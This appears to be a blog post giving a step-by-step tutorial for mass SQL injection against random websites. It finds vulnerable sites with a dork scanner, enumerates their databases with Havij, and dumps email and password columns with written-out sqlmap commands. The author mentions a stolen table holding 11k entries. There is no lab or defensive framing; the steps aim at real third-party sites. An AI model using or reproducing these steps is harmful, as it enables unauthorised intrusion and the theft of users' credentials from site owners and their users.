==========Stuff==========
Havij 1.15
Havij 1.15.rar
SQLMap :
SQLmap.zip
Python 2.7 :
Python DOWNLOAD
Gr3enox exploit scanner :
Scanner.rar
Havij 1.15
Havij 1.15.rar
SQLMap :
SQLmap.zip
Python 2.7 :
Python DOWNLOAD
Gr3enox exploit scanner :
Scanner.rar
==========Sql injection==========
1.===Vulnerable website===
Gr3enox Exploit scanner :
What is this program :
Gr3enox exploit scanner , is an exploit scanner.
This tool will find for you all vulnerable website with your dork SQL/XSS...
How to use it :
-Launch Gr3eNox Exploit Scanner V1.1.exe
-Add your dork [ In this tutorial i will use : "index.php?cid=" ]
-You can add custom domain..
-And press on search
***SEARCH DONE***
-Ok now press on "Start" and he will give you all vulnerable websites
***SCAN DONE***
==========Havij 1.15==========
-Now you have your vulnerable website.
-Open havij
-Put your vulnerable website
-And click on Analyze ( I used other website , the link i added was not vulneralbe)
-DB FOUND ! , Go in Tables section.
-Click on DBS To see if there is more database.
-Yes+4 DBS !
- Now select a DBS , Or all DBS and click on "GET TABLES" And wait.
- I found tables user , I select it , and i click on "GET COLUMNS".
- now i have "email" and "pass" columns , with 11k in it.
- Let's open SQLMAP to dump ! (on windows).
==========SQLMap==========
-Open CMD
- do : cd c:/sqlmap (my folder is named sqlmap"
- do : sqlmap.py -u vulnwebsite.com/lol.php?id= --dbs
-they give you same dbs on havij , check on havij , and look which dbs got "User" tables.
-when you found , go on SQLmap , and do : sqlmap.py -u vulnwebsite.com/lol.php?id= -D databasenamehere --tables
-now you have all tables , do that to get tables column sqlmap.py -u vulnwebsite.com/lol.php?id= -D databasenamehere -T tablesname --columns
ok now you have columns , to get all data just do :
sqlmap.py -u vulnwebsite.com/lol.php?id= -D databasenamehere -T tablesname -C Email,Password --dump.
AND YOU GET ALL DATA :
-All data are saved in log.
0 comments:
Post a Comment